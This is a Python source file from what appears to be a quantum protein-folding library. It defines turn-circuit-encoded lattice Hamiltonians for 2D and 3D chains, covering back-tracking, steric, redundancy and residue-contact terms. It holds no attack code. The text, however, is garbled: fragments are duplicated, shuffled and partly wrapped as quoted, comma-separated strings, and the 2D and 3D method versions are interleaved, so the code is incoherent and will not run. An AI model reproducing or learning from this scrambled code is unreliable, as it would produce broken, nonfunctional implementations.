(self.a_x(i, j) + \\ self.a_y(i, j)) def interaction_term(self):", "sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'y-':", "self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-') } maximum", "go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\", "* self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the", "def circuit_zp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the", "x in range(maximum)] return self._sum_strings[(i, j, k)] def back_term(self): \"\"\"Ensures that the chain", "return self._sum_strings[(i, j, k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2))", "return (1-q_i)*(1-q_j) def sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\" if i", "(1-q_i) * (1-q_j) * (1-q_k) def circuit_011(self, q_i, q_j, q_k): \"\"\"Implements a circuit", "2: return sp.numbers.Integer(0) sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j,", "[self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'z+': sum_string", "{ 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'),", "return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for", "= b maximum = int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string)) self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x])", "= [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] else: raise ValueError('k was {:s}'.format(k))", "ith turn.\"\"\" return 3*i def circuit_xp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that", "x+.\"\"\" return q_i * q_j * q_k def circuit_xn(self, q_i, q_j, q_k): \"\"\"Implements", "int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if maximum == 0: return 0 prefactor", "qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for", "is_3D = True @property def dim(self): return 3 def pointer(self, i): \"\"\"Points to", "2*i def circuit_xp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the", "r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that the chain does not overlap.\"\"\"", "in range(1, p-1)]) \\ * qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(1, p+1)])", "in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def a_z(self, i, j): sumstring", "'y+'), 'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-'),", "= sp.numbers.Integer(0) for i in range(self.naas-3): for j in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i,", "0 else [0] else: iterator = range(1, t+1, 2) if t > 1", "def circuit_yp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the", "prefactor * \\ ( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ * qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r", "== 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k", "in range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for", "self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i,", "half_adder(self, q_i, q_j): \"\"\"Applies a half-adder.\"\"\" return qand([q_i, q_j]), qxor(q_i, q_j) @property @abstractmethod", "q_i*q_j def circuit_yn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the", "p in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1 * self.int_mat[i, j]", "range(i, j)] elif k == 'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t", "prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r", "if i-j !=0 else 0 if maximum == 0: return 0 prefactor =", "'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k", "self.expr += self.interaction_term() #self.expr = se.expand(self.expr) self.n_terms = len(self.expr.args) def get(self, k): \"\"\"Access", "* from proteinham.core.hamiltonian import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True def __init__(self, pepstring,", "<filename>proteinham/lattice/turn_circuit.py import math import numpy as np import sympy as sp import symengine", "self.n_bits = self.dim * (self.naas-1) self._sum_strings = dict() self._create_bitreg() @property def encoding(self): return", "k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif", "in range(maximum)]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r],", "for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in", "range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in", "not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) +", "for r in range(maximum)]) for k in ['x', 'z']]) return prefactor * \\", "Babbush et al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat = ss_fmat self.n_bits = self.dim * (self.naas-1)", "a protein hamiltonian of the \"turn circuit encoding\" form, described by Babbush et", "j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in", "0 if maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for", "+ \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for", "i-j != 0 else 0 if maximum == 0: return 0 prefactor =", "* qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['x+'][p-2],", "t in chain(range(n_layers), reversed(range(n_layers-1))): if t % 2 == 0: iterator = range(0,", "from copy import deepcopy from itertools import chain from functools import reduce from", "range(maximum)]) for k in ['x', 'y']]) return prefactor * \\ ( qxor(sumstring['z+'][0], sumstring['z-'][0])", "def circuit_000(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks the nonsensical string", "self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k in range(self.naas-1)]) def back_term(self):", "k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in", "q_i, q_j, q_k): \"\"\"Implements a circuit that checks the nonsensical string 000.\"\"\" return", "if the chain moves in the direction x-.\"\"\" return q_i * (1-q_j) *", "sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] else: raise ValueError('k", "protein hamiltonian of the \"turn circuit encoding\" form, described by Babbush et al.,", "self.get(self.pointer(t)+2)) for t in range(i, j)] else: raise ValueError('k was {:s}'.format(k)) n_layers =", "return 0 prefactor = qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)]) return prefactor", "def circuit_xp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the chain", "range(1, maximum)]) \\ + sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for", "is_2D = True @property def dim(self): return 2 def pointer(self, i): \"\"\"Points to", "'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k ==", "['x', 'y']]) return prefactor * \\ ( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ * qand([ qxnor(sumstring['z+'][r],", "= self.dim * (self.naas-1) self._sum_strings = dict() self._create_bitreg() @property def encoding(self): return 'turn_circuit'", "* self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2))", "== 0: return 0 prefactor = qand([ qand([ qxnor(sumstring['%s+' % k][r], sumstring['%s-' %", "pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True @property def dim(self): return 2 def pointer(self,", "the direction x-.\"\"\" return q_i * (1-q_j) * (1-q_k) def circuit_yp(self, q_i, q_j,", "if the chain moves in the direction y+.\"\"\" return q_i*q_j def circuit_yn(self, q_i,", "qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r", "__init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates the expression and methods of a protein hamiltonian of", "start of the string describing the ith turn.\"\"\" return 2*i def circuit_xp(self, q_i,", "qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(1, maximum)]) \\", "itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)),", "[sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i, j, k)] def back_term(self): \"\"\"Ensures that", "in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] ) def steric_term(self):", "qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\", "self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) *", "maximum)]) \\ + sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r", "000 and 011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2))", "self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'x-': sum_string =", "'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } return qand( [qxnor(sumstring['x+'][r],", "011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k", "% k][r]) for r in range(maximum)]) for k in ['x', 'z']]) return prefactor", "back_term(self): \"\"\"Ensures that the chain does not go back on itself.\"\"\" return sum([", "circuit that checks the nonsensical string 000.\"\"\" return (1-q_i) * q_j * q_k", "'z+'), 'z-': self.sum_string(i, j, 'z-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else", "= int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if maximum == 0: return 0", "hamiltonian.\"\"\" return self.bit_list[k] def half_adder(self, q_i, q_j): \"\"\"Applies a half-adder.\"\"\" return qand([q_i, q_j]),", "self._create_bitreg() @property def encoding(self): return 'turn_circuit' def build_exp(self): self.expr = (self.naas+1) * self.back_term()", "range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def a_y(self, i, j): sumstring =", "= [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'x-':", "chain moves in the direction y-.\"\"\" return (1-q_i)*(1-q_j) def sum_string(self, i, j, k):", "in range(self.naas-3): for j in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue", "% k][r], sumstring['%s-' % k][r]) for r in range(maximum)]) for k in ['y',", "self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)),", "range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t", "range(self.naas-3): for j in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr", "describing the ith turn.\"\"\" return 3*i def circuit_xp(self, q_i, q_j, q_k): \"\"\"Implements a", "in range(i, j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t", "(self.a_x(i, j) + \\ self.a_y(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr", "i and j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if", "!= 0 or maximum < 2: return sp.numbers.Integer(0) sumstring = { 'x+': self.sum_string(i,", "if t % 2 == 0: iterator = range(0, t+1, 2) if t", "in range(maximum)] return self._sum_strings[(i, j, k)] def back_term(self): \"\"\"Ensures that the chain does", "range(maximum)] return self._sum_strings[(i, j, k)] def redun_term(self): \"\"\"Implements the term that penalises meaningless", "for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in", "q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the chain moves", "start of the string describing the ith turn.\"\"\" return 3*i def circuit_xp(self, q_i,", "self._sum_strings.keys(): return self._sum_strings[(i, j, k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1))", "self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\", "return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)),", "return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True @property def dim(self): return 3 def", "circuit_xn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the chain", "self._proc_input(pepstring) self.ss_fmat = ss_fmat self.n_bits = self.dim * (self.naas-1) self._sum_strings = dict() self._create_bitreg()", "else: iterator = range(1, t+1, 2) if t > 1 else [1] for", "maximum+1)])) def interaction_term_ij(self, i, j): return -1* self.int_mat[i, j] * (self.a_x(i, j) +", "r in range(1, maximum)]) \\ + sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ * qand([ qxnor(sumstring['x+'][r-1],", "chain moves in the direction x-.\"\"\" return q_i*(1-q_j) def circuit_yp(self, q_i, q_j): \"\"\"Implements", "j)] elif k == 'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in", "[self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'z-': sum_string", "maximum+1)]) for p in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1* self.int_mat[i,", "* q_j * (1-q_k) def circuit_zp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that", "self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)),", "1 else [1] for h in iterator: if self.ss_fmat == 'babej': if counter[h]", "= int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string)) self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for x in", "that checks the nonsensical string 000.\"\"\" return (1-q_i) * (1-q_j) * (1-q_k) def", "j) + \\ self.a_z(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr =", "sum string.\"\"\" if i > j: raise ValueError(\"i > j\") if (i, j,", "for t in range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1),", "range(0, t+1, 2) if t > 0 else [0] else: iterator = range(1,", "return self.bit_list[k] def half_adder(self, q_i, q_j): \"\"\"Applies a half-adder.\"\"\" return qand([q_i, q_j]), qxor(q_i,", "the direction y-.\"\"\" return (1-q_i)*(1-q_j) def sum_string(self, i, j, k): \"\"\"Computes the sum", "direction y-.\"\"\" return (1-q_i)*(1-q_j) def sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\"", "residues i and j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0", "if self.ss_fmat == 'babej': if counter[h] > math.log2(j-i): continue else: counter[h] += 1", "* q_k def circuit_zn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1", "return (1-q_i) * (1-q_j) * q_k def circuit_zn(self, q_i, q_j, q_k): \"\"\"Implements a", "= range(0, t+1, 2) if t > 0 else [0] else: iterator =", "if self.dim == 3: self.expr += (self.naas+1)**2 * self.redun_term() self.expr += (self.naas+1) *", "range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1*", "+= self.interaction_term() #self.expr = se.expand(self.expr) self.n_terms = len(self.expr.args) def get(self, k): \"\"\"Access the", "self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the", "r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(p+1,", "j) + \\ self.a_y(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr =", "+ \\ self.a_y(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0)", "> 0 else [0] else: iterator = range(1, t+1, 2) if t >", "return 0 prefactor = qand([ qand([ qxnor(sumstring['%s+' % k][r], sumstring['%s-' % k][r]) for", "self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'y+': sum_string =", "j: raise ValueError(\"i > j\") if (i, j, k) in self._sum_strings.keys(): return self._sum_strings[(i,", "itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) *", "self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for", "term for residues i and j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0", "\"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0) for i in range(self.naas-3): for j", "range(1, maximum)]) \\ + sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for", "qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1])", "* (1-q_j) * (1-q_k) def circuit_yp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that", "the ith turn.\"\"\" return 2*i def circuit_xp(self, q_i, q_j): \"\"\"Implements a circuit that", "k in ['x', 'z']]) return prefactor * \\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ *", "1 if the chain moves in the direction y+.\"\"\" return q_i*q_j def circuit_yn(self,", "return 2 def pointer(self, i): \"\"\"Points to the start of the string describing", "in range(i, j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for", "qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)]))", "def get(self, k): \"\"\"Access the kth bit of the hamiltonian.\"\"\" return self.bit_list[k] def", "sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2))", "a circuit that returns 1 if the chain moves in the direction y+.\"\"\"", "returns 1 if the chain moves in the direction x-.\"\"\" return q_i*(1-q_j) def", "sumstring['%s-' % k][r]) for r in range(maximum)]) for k in ['x', 'z']]) return", "0 prefactor = qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)]) return prefactor *\\", "'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-'), }", "def redun_term(self): \"\"\"Implements the term that penalises meaningless residue bitstrings 000 and 011.\"\"\"", "> math.log2(j-i): continue else: counter[h] += 1 a, b = self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h]", "sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1))", "elif k == 'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i,", "k)] def back_term(self): \"\"\"Ensures that the chain does not go back on itself.\"\"\"", "in the direction y+.\"\"\" return q_i*q_j def circuit_yn(self, q_i, q_j): \"\"\"Implements a circuit", "if the chain moves in the direction z-.\"\"\" return (1-q_i) * q_j *", "self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)),", "functools import reduce from .qlogic import * from proteinham.core.hamiltonian import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian):", "qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1])", "from proteinham.core.hamiltonian import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True def __init__(self, pepstring, ss_fmat='babej'):", "+= (self.naas+1) * self.steric_term() self.expr += self.interaction_term() #self.expr = se.expand(self.expr) self.n_terms = len(self.expr.args)", "sum([ sum([ self.overlap(i, j) for j in range(i+1, self.naas)]) for i in range(self.naas)])", "return prefactor * \\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for", "+ \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1),", "* (self.a_x(i, j) + \\ self.a_y(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\"", "range(1, p-1)]) \\ * qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(1, p+1)]) \\", "self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i", "def circuit_xn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the", "class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True @property def dim(self): return 2 def pointer(self, i):", "\\ * qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(1, p+1)]) \\ * qand([", "self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)),", "+ \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1),", "self.dim * (self.naas-1) self._sum_strings = dict() self._create_bitreg() @property def encoding(self): return 'turn_circuit' def", "(1-q_k) def circuit_yp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if", "in range(maximum)] + \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(maximum)] ) def steric_term(self):", "chain from functools import reduce from .qlogic import * from proteinham.core.hamiltonian import Hamiltonian", "sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k in range(self.naas-1)])", "self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\", "\\ * qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(1, maximum)]) \\ + sum([", "self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1),", "for k in ['y', 'z']]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\", "self.get(self.pointer(t)+1)) for t in range(i, j)] else: raise ValueError('k was {:s}'.format(k)) n_layers =", "methods of a protein hamiltonian of the \"turn circuit encoding\" form, described by", "else 0 if maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r])", "0 or maximum < 2: return sp.numbers.Integer(0) sumstring = { 'x+': self.sum_string(i, j,", "* qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2,", "iterator = range(1, t+1, 2) if t > 1 else [1] for h", "self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)),", "for r in range(maximum)]) for k in ['x', 'y']]) return prefactor * \\", "int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if maximum == 0: return 0", "in the direction x+.\"\"\" return 